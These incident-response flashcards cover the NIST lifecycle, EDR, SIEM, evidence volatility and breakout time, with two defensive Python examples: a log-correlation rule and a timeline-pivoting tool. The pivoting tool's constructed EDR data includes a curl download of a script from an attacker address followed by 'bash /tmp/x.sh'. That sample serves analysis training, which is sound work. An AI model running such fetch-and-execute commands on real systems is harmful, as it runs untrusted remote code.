Incident Response Flashcards

1
Q

IR Process

A

Preparation
Detection
Analysis
Containment
Eradication/Recovery
Post-incident Activity

(This is the NIST SP 800-61 lifecycle. NIST groups Detection and Analysis into one phase and Containment, Eradication and Recovery into another; the cards below split them.)

2
Q

Preparation

A

The "proactive" phase: everything done before an incident occurs, so that the reactive phases can start quickly when one does.

3
Q

What are the key ingredients of the Preparation step?

A

A written IR plan (roles, contacts, escalation paths)
Properly trained staff
Forensic hardware and software, set up and tested before they are needed
Regular exercises/practice (tabletop and live drills)

4
Q

Detection

A

Start of the reactive part of the process: the moment you learn that something is wrong.

5
Q

What ways can you detect?

A

Endpoint Detection and Response (telemetry from the hosts themselves)
Security Information and Event Management (correlation across collected logs)
Your own users (reporting odd behaviour, phishing, slow machines)
ISPs
Law enforcement
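
A SIEM detects by correlating events rather than by looking at one line at a time. The block below is an added example, not code from the original page: it parses a few constructed sshd-style log lines (hypothetical host "bastion01", documentation IP ranges) and fires an alert when one source address fails to log in several times and then succeeds within a window, a classic brute-force-then-success rule.

```python
"""SIEM-style correlation rule over constructed auth log lines.
Added example; the log lines, host name and addresses are constructed, not real data."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in a syslog-like format (hypothetical host "bastion01").
SAMPLE_LOG = """\
2024-03-01T09:00:01Z bastion01 sshd: Failed password for admin from 203.0.113.7
2024-03-01T09:00:03Z bastion01 sshd: Failed password for admin from 203.0.113.7
2024-03-01T09:00:05Z bastion01 sshd: Failed password for root from 203.0.113.7
2024-03-01T09:00:06Z bastion01 sshd: Failed password for admin from 203.0.113.7
2024-03-01T09:00:08Z bastion01 sshd: Failed password for admin from 203.0.113.7
2024-03-01T09:00:40Z bastion01 sshd: Accepted password for admin from 203.0.113.7
2024-03-01T09:05:00Z bastion01 sshd: Failed password for alice from 198.51.100.4
2024-03-01T09:30:00Z bastion01 sshd: Accepted publickey for alice from 198.51.100.4
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd: (?P<outcome>Failed|Accepted) \S+ for "
    r"(?P<user>\S+) from (?P<src>\S+)$"
)


def parse(log_text):
    """Turn raw lines into (timestamp, host, outcome, user, src) tuples; skip non-auth lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["host"], m["outcome"], m["user"], m["src"]))
    return events


def detect_bruteforce_success(events, threshold=5, window=timedelta(minutes=5)):
    """Alert when a source has >= threshold failures inside `window` before a success.

    The rule is stateful: it remembers failures per source and evaluates the
    condition only at the moment a success arrives from that same source.
    """
    failures = defaultdict(list)  # src -> timestamps of failed logins
    alerts = []
    for ts, host, outcome, user, src in sorted(events):
        if outcome == "Failed":
            failures[src].append(ts)
            continue
        recent = [t for t in failures[src] if ts - t <= window]
        if len(recent) >= threshold:
            alerts.append({"src": src, "user": user, "host": host,
                           "at": ts.isoformat(), "failures": len(recent)})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce_success(parse(SAMPLE_LOG)):
        print("ALERT brute-force then success:", alert)
```

The single alert is for 203.0.113.7 logging in as admin after five failures; alice's one typo followed by a key-based login stays below the threshold. Tune `threshold` and `window` to the environment, since a rule that is too loose buries the analyst and one that is too tight misses slow attacks.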

6
Q

What is EDR?

A

Endpoint Detection and Response

7
Q

What is SIEM?

A

Security Information and Event Management

8
Q

Analysis

A

Collecting evidence, in order of volatility (most volatile first, per RFC 3227):
- Memory
- Network activity (live connections, then captures and flow logs)
- Log/Registry files
- Disk images

9
Q

What is the goal of Analysis

A

Determine the root cause of the incident and reconstruct the actions of the threat actor, normally by merging the collected evidence into a single timeline and pivoting on known indicators.
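
Reconstructing the actor's actions usually means normalising evidence from several sources into one time-ordered timeline and then pivoting: start from a known indicator, find every event that touches it, and let the entities in those events (users, addresses, file paths) become new indicators. The block below is an added example, not code from the page or from any product; the EDR events, firewall rows, host "web01" and all addresses are constructed.

```python
"""Analysis: merge evidence from several sources into one timeline and pivot on
indicators to reconstruct the actor's actions. Added example with constructed data."""
import csv
import io
import json
import re
from datetime import datetime

# Constructed EDR process events (JSON lines) from a hypothetical host "web01" (10.0.0.5).
EDR_JSONL = """\
{"ts":"2024-03-01T09:00:45Z","host":"web01","user":"admin","cmd":"curl http://203.0.113.7/x.sh -o /tmp/x.sh"}
{"ts":"2024-03-01T09:00:50Z","host":"web01","user":"admin","cmd":"bash /tmp/x.sh"}
{"ts":"2024-03-01T09:02:00Z","host":"web01","user":"www","cmd":"nginx -g daemon off;"}
"""

# Constructed perimeter firewall log (CSV).
FW_CSV = """\
ts,src,dst,dport,action
2024-03-01T09:00:40Z,203.0.113.7,10.0.0.5,22,allow
2024-03-01T09:00:46Z,10.0.0.5,203.0.113.7,80,allow
2024-03-01T09:01:30Z,10.0.0.5,10.0.0.9,445,allow
2024-03-01T09:02:10Z,192.0.2.9,10.0.0.5,443,allow
"""

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PATH_RE = re.compile(r"(?<!\S)/\S+")  # absolute paths that stand alone as a token


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def load_edr(text):
    """Normalise EDR events. 'entities' holds the pivotable values: user, IPs, file paths.
    The host name is deliberately not an entity: pivoting on it would drag in every
    event on the box (the nginx process below) rather than the actor's activity."""
    events = []
    for line in text.splitlines():
        e = json.loads(line)
        ents = {e["user"]} | set(IP_RE.findall(e["cmd"])) | set(PATH_RE.findall(e["cmd"]))
        events.append({"ts": _ts(e["ts"]), "source": "edr", "host": e["host"],
                       "summary": f'{e["user"]} ran: {e["cmd"]}', "entities": ents})
    return events


def load_fw(text):
    """Normalise firewall rows; both endpoints are pivotable."""
    events = []
    for r in csv.DictReader(io.StringIO(text)):
        events.append({"ts": _ts(r["ts"]), "source": "fw", "host": "fw",
                       "summary": f'{r["src"]} -> {r["dst"]}:{r["dport"]} {r["action"]}',
                       "entities": {r["src"], r["dst"]}})
    return events


def build_timeline(*sources):
    """One list ordered by time, regardless of which source each event came from."""
    return sorted((e for src in sources for e in src), key=lambda e: e["ts"])


def pivot(timeline, indicators):
    """Events that touch any known indicator."""
    return [e for e in timeline if e["entities"] & indicators]


def expand(timeline, seed, rounds=2):
    """Widen the indicator set: entities of every matched event become new pivots.
    Returns (matched events, indicator set) after `rounds` passes."""
    inds = set(seed)
    matched = []
    for _ in range(rounds):
        matched = pivot(timeline, inds)
        for e in matched:
            inds |= e["entities"]
    return matched, inds


def render(events):
    return [f'{e["ts"].isoformat()} [{e["source"]}/{e["host"]}] {e["summary"]}' for e in events]


if __name__ == "__main__":
    tl = build_timeline(load_edr(EDR_JSONL), load_fw(FW_CSV))
    hits, inds = expand(tl, {"203.0.113.7"})
    print("\n".join(render(hits)))
    print("indicators:", sorted(inds))
```

Seeded with the attacker address alone, one pass returns three events (the inbound SSH session, the curl download, the outbound fetch). A second pass, now pivoting on the victim address, the admin user and /tmp/x.sh, adds the script execution and the SMB connection from 10.0.0.5 to 10.0.0.9, which is the lateral movement the analyst needs to find. It also pulls in an ordinary client hit on port 443 because the victim address is now an indicator: expansion over-includes, and pruning such noise is part of the analyst's job.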

10
Q

Containment

A

Stopping the threat actor from reaching other network resources: isolate affected hosts, block command-and-control addresses, disable compromised credentials, while preserving the evidence Analysis still needs.

11
Q

What is the average eCrime breakout time?

A

1h 24m (84 minutes), the figure reported in the CrowdStrike 2023 Global Threat Report. Breakout time is the time from initial access to the first lateral movement, so containment has to happen inside that window.

12
Q

1-10-60 rule

A

Detect an intrusion within 1 minute, understand (investigate) it within 10 minutes, and contain it within 60 minutes, so the response completes before the attacker's breakout time.

13
Q

Eradication and Recovery

A

Eradication: removing everything the attacker left on the system (malware, persistence mechanisms, rogue accounts, altered configuration). Recovery: restoring systems and data from known-good backups and returning them to production under closer monitoring.

14
Q

Which is easier, reimaging a system or cleaning it?

A

Reimaging. Cleaning leaves you guessing whether every persistence mechanism was found; rebuilding from a known-good image removes that doubt. Take a forensic image first if the system is still needed for Analysis.

15
Q

Post incident activity

A

Lessons learned (what failed in Preparation and Detection, and what to change)
Written report

16
Q

DFIR

A

Digital Forensics/Incident Response

17
Q

Which parts of the incident response process is forensics primarily concerned with?

A

Analysis and post-incident.

18
Q

CSIRT

A

Computer Security Incident Response Team

19
Q

SOC

A

Security Operations Center

20
Q

CSIRT Fusion Center

A

SOC and CSIRT combined

21
Q

What is the SOC responsible for?

A

Handling the initial phase of an incident: monitoring, triage and first response.

22
Q

What must be established first when investigating an incident?

A

Identifying the scope
Identifying the Impact
Identifying the root cause
Identifying attribution